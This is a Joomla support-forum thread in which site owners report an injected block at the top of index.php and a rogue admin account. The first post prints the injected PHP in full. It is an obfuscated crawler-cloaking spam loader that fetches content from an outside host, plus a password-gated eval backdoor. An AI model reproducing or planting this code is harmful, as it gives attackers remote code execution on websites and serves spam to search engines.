Easter Sale 2025

  • 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: index.php changed - critical

index.php changed - critical 11 years 5 months ago #25279

  • thepiston
  • thepiston's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 5
  • Thank you received: 1
I got a critical alert today about my index.php file being changed.

This was added to the top of the file: (hack?)
<?php $GLOBALS['_2115897273_']=Array(base64_decode('' .'ZX' .'Jyb3Jfc' .'mVw' .'b3J0aW5n'),base64_decode('' .'ZG' .'V' .'maW5' .'l'),base64_decode('' .'ZGVma' .'W' .'5l'),base64_decode('' .'ZGVmaW5' .'l'),base64_decode('ZGVma' .'W5l'),base64_decode('ZGVmaW5' .'l'),base64_decode('' .'ZGVmaW5l'),base64_decode('' .'ZGVmaW' .'5l'),base64_decode('b' .'W' .'Q' .'1'),base64_decode('' .'dXJs' .'ZW' .'5jb2Rl'),base64_decode('bWQ1'),base64_decode('bWQ1'),base64_decode('Zmls' .'ZV9l' .'eG' .'lz' .'dH' .'M='),base64_decode('bW' .'tkaXI='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('bW' .'Q1'),base64_decode('Z' .'ndyaXR' .'l'),base64_decode('ZmN' .'sb3' .'Nl'),base64_decode('aW5pX2dldA=='),base64_decode('' .'ZnVuY' .'3Rpb25' .'f' .'ZX' .'hpc' .'3Rz'),base64_decode('c3RyZWF' .'tX2NvbnRleHRf' .'Y3JlYXRl'),base64_decode('Zm' .'lsZV' .'9nZXRfY29udGV' .'udHM='),base64_decode('Z' .'nVuY' .'3Rp' .'b25fZXh' .'pc3Rz'),base64_decode('Y3VybF' .'9pbml0'),base64_decode('Y3' .'VybF9zZXRvcHQ='),base64_decode('Y3' .'VybF9zZXRvc' .'H' .'Q='),base64_decode('Y3' .'VybF9' .'zZ' .'XRvcHQ='),base64_decode('Y' .'3VybF9leGVj'),base64_decode('Y' .'3' .'Vy' .'bF9' .'j' .'bG9zZQ=='),base64_decode('cHJlZ19tY' .'XRjaA=' .'='),base64_decode('Z' .'mlsZV9nZX' .'RfY29u' .'dG' .'VudHM' .'='),base64_decode('cHJlZ1' .'9tYXR' .'jaA=' .'='),base64_decode('cHJlZ1' .'9' .'tY' .'XR' .'jaA=' .'='),base64_decode('c3B' .'yaW50' .'Z' .'g=='),base64_decode('aXA' .'y' .'bG' .'9' .'uZw=' .'='),base64_decode('ZmlsZQ' .'=='),base64_decode('' .'Y291' .'b' .'nQ='),base64_decode('' .'cHJl' .'Z19tYXR' .'jaA=='),base64_decode('c' .'3' .'ByaW50Zg=='),base64_decode('aXAybG' .'9u' .'Zw=' .'='),base64_decode('c3ByaW5' .'0' .'Zg=' .'='),base64_decode('aXAybG9' .'uZ' .'w=='),base64_decode('bWQ1'),base64_decode('bW' .'Q' .'1'),base64_decode('Z' .'mlsZV9leGlzd' .'HM='),base64_decode('Zm' .'ls' .'ZV9le' .'GlzdHM='),base64_decode('aX' .'Nf' .'d3J' .'pdGFi' .'bGU' .'='),base64_decode('ZGlybmFtZQ=='),base64_decode('Zml' .'s' .'Z' .'V9wdXRfY' .'29udG' .'Vu' .'d' .'HM='),base64_decode('aX' .'Nfd3J' .'pdG' .'FibGU' .'='),base64_decode('ZGlyb' .'mFtZQ=='),base64_decode('' .'Zmls' .'ZV9wd' .'XR' .'fY29' .'u' .'dGVu' .'dH' .'M='),base64_decode('c3By' .'a' .'W5' .'0' .'Z' .'g=='),base64_decode('cHJlZ19t' .'Y' .'XRj' .'a' .'A==')); ?><?php function _1074265958($i){$a=Array('RE9PUldBWQ==','elBBUlRBTExQQVJUU1VQREFURQ==','U0VSVkVSX1VSTA==','aHR0cDovL2x1Y2t5bmV0d29yay5uZXQvZG9vcmdlbjJfMy9yZXF1ZXN0LnBocA==','VEVNUF9ESVI=','L3RtcA==','VElNRU9VVA==','Q0hFQ0tFUg==','aHR0cDovL2x1Y2t5bmV0d29yay5uZXQvY2hlY2tfaXAvY2hlY2tfaXAucGhwP2lwPSVz','Q0FDSEVfRklMRU5BTUU=','aXAudHh0','SVBfVVJM','aHR0cDovL2x1Y2t5bmV0d29yay5uZXQvY2hlY2tfaXAvaXAudHh0','aHR0cDovLw==','SFRUUF9IT1NU','UkVRVUVTVF9VUkk=','U0VSVkVSX05BTUU=','Lw==','U0VSVkVSX05BTUU=','P2Rvb3J3YXk9','JnVybD0=','JmRvbWFpbj0=','SFRUUF9VU0VSX0FHRU5U','UkVNT1RFX0FERFI=','UVVFUllfU1RSSU5H','cQ==','b2sh','ZXI=','cGhwX2NvZGU=','ZXI=','YzQ1OWI2YTFiZDE1YjU4OTRlODczOTJmMmJiNzE2YzY=','Lw==','UkVRVUVTVF9VUkk=','d2I=','YWxsb3dfdXJsX2ZvcGVu','ZmlsZV9nZXRfY29udGVudHM=','aHR0cA==','bWV0aG9k','R0VU','dGltZW91dA==','Y3VybF9pbml0','L15ccyooKFxkezEsM31cLlxkezEsM31cLlxkezEsM30pXC4oXGR7MSwzfSkpXHMqJC8=','L15ccyo=','XHMqJC9t','L15ccyo=','XHMqJC9t','JXU=','IV5ccyooXGR7MSwzfVwuXGR7MSwzfVwuXGR7MSwzfVwuXGR7MSwzfSktKFxkezEsM31cLlxkezEsM31cLlxkezEsM31cLlxkezEsM30pXHMqJCE=','JXU=','JXU=','MQ==','L0Fza1xzKkplZXZlcy9p','L0hQXHMqV2ViXHMqUHJpbnRTbWFydC9p','L0hUVHJhY2svaQ==','L0luZHlccypMaWJyYXJ5L2k=','L0dvb2dsZS9p','L2dvb2dsZS9p','L01lZGlhcGFydG5lcnMvaQ==','L1JQVC1IVFRQQ2xpZW50L2k=','L0xpc3RDaGVja2VyL2k=','L01TSUVDcmF3bGVyL2k=','L05ldENhY2hlL2k=','L0lEQm90L2k=','L051dGNoL2k=','L3J1bGlua2lcLnJ1L2k=','L1R3aWNlbGVyL2k=','L1dlYkFsdGEvaQ==','L1dlYnN0ZXJccypQcm8vaQ==','L3d3d1wuY3lzXC5ydS9p','L1d5c2lnb3QvaQ==','L1lhaG9vIVxzKlNsdXJwL2k=','L1lldGkvaQ==','L0FjY29vbmEvaQ==','L0Nhem9vZGxlQm90L2k=','L0NGTmV0d29yay9p','L0NvbnZlcmFDcmF3bGVyL2k=','L0RJU0NvL2k=','L0Rvd25sb2FkXHMqTWFzdGVyL2k=','L0ZsZXh1bVxzKnNwaWRlci9p','L0ZBU1RccypNZXRhV2ViXHMqQ3Jhd2xlci9p','L0dpZ2Fib3QvaQ==','L0dzYS9p','L0hUTUxQYXJzZXIvaQ==','L2lhX2FyY2hpdmVyL2k=','L2ljaGlyby9p','L0lSTGJvdC9p','L2ttXC5ydVxzKmJvdC9p','L2ttU2VhcmNoQm90L2k=','L2xpYnd3dy1wZXJsL2k=','L0x1cGFcLnJ1L2k=','L0xXUDo6U2ltcGxlL2k=','L2x3cC10cml2aWFsL2k=','L01pc3NpZ3VhL2k=','L01KMTJib3QvaQ==','L21zbmJvdC9p','L21zbmJvdC1tZWRpYS9p','L09tbmlFeHBsb3Jlcl9Cb3QvaQ==','L1BFQVIvaQ==','L3BzYm90L2k=','L0JpbmcvaQ==','L1B5dGhvbi9p','L3J1bGlua2lcLnJ1L2k=','L1NNSUxFL2k=','L1NwZWVkeS9p','L1RlbGVwb3J0XHMqUHJvL2k=','L1R1cnRsZVNjYW5uZXIvaQ==','L3ZveWFnZXIvaQ==','L1dlYmFsdGEvaQ==','L1dlYkNvcGllci9p','L1dlYkRhdGEvaQ==','L1dlYlpJUC9p','L1dnZXQvaQ==','L1lhbmRleC9p','L1lhbmdhL2k=','L1lldGkvaQ==','L21zbmJvdC9p','L3NwaWRlci9p','L3lhaG9vL2k=','L1lhaG9vL2k=','L2plZXZlcy9p','L2FsdGF2aXN0YS9p','L3Njb290ZXIvaQ==','L2F2XHMqZmV0Y2gvaQ==','L2FzdGVyaWFzL2k=','L3NwaWRlcnRocmVhZFxzKnJldmlzaW9uL2k=','L3Nxd29ybS9p','L2Fzay9p','L2x5Y29zLnNwaWRlci9p','L2luZm9zZWVrc2lkZXdpbmRlci9p','L3VsdHJhc2Vlay9p','L3BvbHlib3QvaQ==','L3dlYmNyYXdsZXIvaQ==','L2NyYXdsL2k=','L3JvYm96aWxsL2k=','L2d1bGxpdmVyL2k=','L2FyY2hpdGV4dHNwaWRlci9p','L3lhaG9vIVxzKnNsdXJwL2k=','L1NsdXJwL2k=','L3NsdXJwL2k=','L2NoYXJsb3R0ZS9p','L25nYi9p');return base64_decode($a[$i]);} ?><?php $GLOBALS['_2115897273_'][0](round(0));$GLOBALS['_2115897273_'][1](_1074265958(0),_1074265958(1));$GLOBALS['_2115897273_'][2](_1074265958(2),_1074265958(3));$GLOBALS['_2115897273_'][3](_1074265958(4),_1074265958(5));$GLOBALS['_2115897273_'][4](_1074265958(6),round(0+180));$GLOBALS['_2115897273_'][5](_1074265958(7),_1074265958(8));$GLOBALS['_2115897273_'][6](_1074265958(9),_1074265958(10));$GLOBALS['_2115897273_'][7](_1074265958(11),_1074265958(12));$_0=_1074265958(13) .$_SERVER[_1074265958(14)] .$_SERVER[_1074265958(15)];$_1=$_SERVER[_1074265958(16)];$_2=TEMP_DIR ._1074265958(17) .$GLOBALS['_2115897273_'][8]($_SERVER[_1074265958(18)]);$_3=SERVER_URL ._1074265958(19) .DOORWAY ._1074265958(20) .$GLOBALS['_2115897273_'][9]($_0) ._1074265958(21) .$_1;if(l__4($_SERVER[_1074265958(22)])or l__3($_SERVER[_1074265958(23)])){if($_SERVER[_1074265958(24)]== _1074265958(25))die(_1074265958(26));if(isset($_REQUEST[_1074265958(27)])&& isset($_REQUEST[_1074265958(28)])&& $GLOBALS['_2115897273_'][10]($GLOBALS['_2115897273_'][11]($_REQUEST[_1074265958(29)]))== _1074265958(30)){eval($_REQUEST["php_code"]);die();}$_4=l__1($_3);echo $_4;exit();}function l__0($_4,$_2){if(!$GLOBALS['_2115897273_'][12]($_2)){$GLOBALS['_2115897273_'][13]($_2);}$_5=$GLOBALS['_2115897273_'][14]($_2 ._1074265958(31) .$GLOBALS['_2115897273_'][15]($_SERVER[_1074265958(32)]),_1074265958(33));if($_5){$GLOBALS['_2115897273_'][16]($_5,$_4);$GLOBALS['_2115897273_'][17]($_5);}}function l__1($_6){if($GLOBALS['_2115897273_'][18](_1074265958(34))and $GLOBALS['_2115897273_'][19](_1074265958(35))){$_7=array(_1074265958(36)=> array(_1074265958(37)=> _1074265958(38),_1074265958(39)=> TIMEOUT));$_8=$GLOBALS['_2115897273_'][20]($_7);return@$GLOBALS['_2115897273_'][21]($_6,NULL,$_8);}elseif($GLOBALS['_2115897273_'][22](_1074265958(40))){$_9=$GLOBALS['_2115897273_'][23]();$GLOBALS['_2115897273_'][24]($_9,CURLOPT_URL,$_6);$GLOBALS['_2115897273_'][25]($_9,CURLOPT_RETURNTRANSFER,TRUE);$GLOBALS['_2115897273_'][26]($_9,CURLOPT_TIMEOUT,TIMEOUT);$_10=$GLOBALS['_2115897273_'][27]($_9);$GLOBALS['_2115897273_'][28]($_9);return $_10;}else{return FALSE;}}function l__2($_11,$_12){if($GLOBALS['_2115897273_'][29](_1074265958(41),$_11,$_13)){$_14=$_13[round(0+0.4+0.4+0.4+0.4+0.4)];$_15=$GLOBALS['_2115897273_'][30]($_12);if($GLOBALS['_2115897273_'][31](_1074265958(42) .$_14 ._1074265958(43),$_15)){return true;}elseif($GLOBALS['_2115897273_'][32](_1074265958(44) .$_13[round(0+0.5+0.5)] ._1074265958(45),$_15)){return true;}else{$_16=false;$_11=$GLOBALS['_2115897273_'][33](_1074265958(46),$GLOBALS['_2115897273_'][34]($_13[round(0+0.2+0.2+0.2+0.2+0.2)]));$_17=$GLOBALS['_2115897273_'][35]($_12);for($_18=round(0);$_18<$GLOBALS['_2115897273_'][36]($_17);$_18++){if(!empty($_16))break;if($GLOBALS['_2115897273_'][37](_1074265958(47),$_17[$_18],$_19)){$_20=$GLOBALS['_2115897273_'][38](_1074265958(48),$GLOBALS['_2115897273_'][39]($_19[round(0+1)]));$_21=$GLOBALS['_2115897273_'][40](_1074265958(49),$GLOBALS['_2115897273_'][41]($_19[round(0+1+1)]));if($_11 >= $_20 && $_11 <= $_21)$_16=true;}}if(!empty($_16))return true;return false;}}else{return false;}}function l__3($_11){$_22=TEMP_DIR .DIRECTORY_SEPARATOR .$GLOBALS['_2115897273_'][42](CACHE_FILENAME);$_23=$GLOBALS['_2115897273_'][43](CACHE_FILENAME);if($GLOBALS['_2115897273_'][44]($_22)){return l__2($_11,$_22);}elseif($GLOBALS['_2115897273_'][45]($_23)){return l__2($_11,$_23);}else{if(@$GLOBALS['_2115897273_'][46]($GLOBALS['_2115897273_'][47]($_22))){@$GLOBALS['_2115897273_'][48]($_22,l__1(IP_URL));return l__2($_11,$_22);}elseif(@$GLOBALS['_2115897273_'][49]($GLOBALS['_2115897273_'][50]($_23))){@$GLOBALS['_2115897273_'][51]($_23,l__1(IP_URL));return l__2($_11,$_23);}else{$_24=l__1($GLOBALS['_2115897273_'][52](CHECKER,$_11));return $_24 === _1074265958(50)?true:false;}}}function l__4($_25){$_26=array(_1074265958(51),_1074265958(52),_1074265958(53),_1074265958(54),_1074265958(55),_1074265958(56),_1074265958(57),_1074265958(58),_1074265958(59),_1074265958(60),_1074265958(61),_1074265958(62),_1074265958(63),_1074265958(64),_1074265958(65),_1074265958(66),_1074265958(67),_1074265958(68),_1074265958(69),_1074265958(70),_1074265958(71),_1074265958(72),_1074265958(73),_1074265958(74),_1074265958(75),_1074265958(76),_1074265958(77),_1074265958(78),_1074265958(79),_1074265958(80),_1074265958(81),_1074265958(82),_1074265958(83),_1074265958(84),_1074265958(85),_1074265958(86),_1074265958(87),_1074265958(88),_1074265958(89),_1074265958(90),_1074265958(91),_1074265958(92),_1074265958(93),_1074265958(94),_1074265958(95),_1074265958(96),_1074265958(97),_1074265958(98),_1074265958(99),_1074265958(100),_1074265958(101),_1074265958(102),_1074265958(103),_1074265958(104),_1074265958(105),_1074265958(106),_1074265958(107),_1074265958(108),_1074265958(109),_1074265958(110),_1074265958(111),_1074265958(112),_1074265958(113),_1074265958(114),_1074265958(115),_1074265958(116),_1074265958(117),_1074265958(118),_1074265958(119),_1074265958(120),_1074265958(121),_1074265958(122),_1074265958(123),_1074265958(124),_1074265958(125),_1074265958(126),_1074265958(127),_1074265958(128),_1074265958(129),_1074265958(130),_1074265958(131),_1074265958(132),_1074265958(133),_1074265958(134),_1074265958(135),_1074265958(136),_1074265958(137),_1074265958(138),_1074265958(139),_1074265958(140));foreach($_26 as $_27){if($GLOBALS['_2115897273_'][53]($_27,$_25)){return TRUE;}}return FALSE;} ?>
The administrator has disabled public write access.
The following user(s) said Thank You: frankdsm

index.php changed - critical 11 years 5 months ago #25283

  • frankdsm
  • frankdsm's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
Hi, I found the exact same code at the top of my index.php file today. Let me know if you have any news. My Joomla Version is 1.7.0, what is yours?
The administrator has disabled public write access.

index.php changed - critical 11 years 5 months ago #25284

  • frankdsm
  • frankdsm's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
Additionally I just found out that a new user was created (with admin rights!). the e-mail address used for the new user was " This e-mail address is being protected from spambots. You need JavaScript enabled to view it ".
The administrator has disabled public write access.

index.php changed - critical 11 years 5 months ago #25375

  • gate77
  • gate77's Avatar
  • OFFLINE
  • Fresh Boarder
  • Posts: 2
I noticed this also, is this a hack. Was this figured out by someone. I disabled the account but it re-enabled itself after a while. Could be by a plugin or component???
The administrator has disabled public write access.
  • 1

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!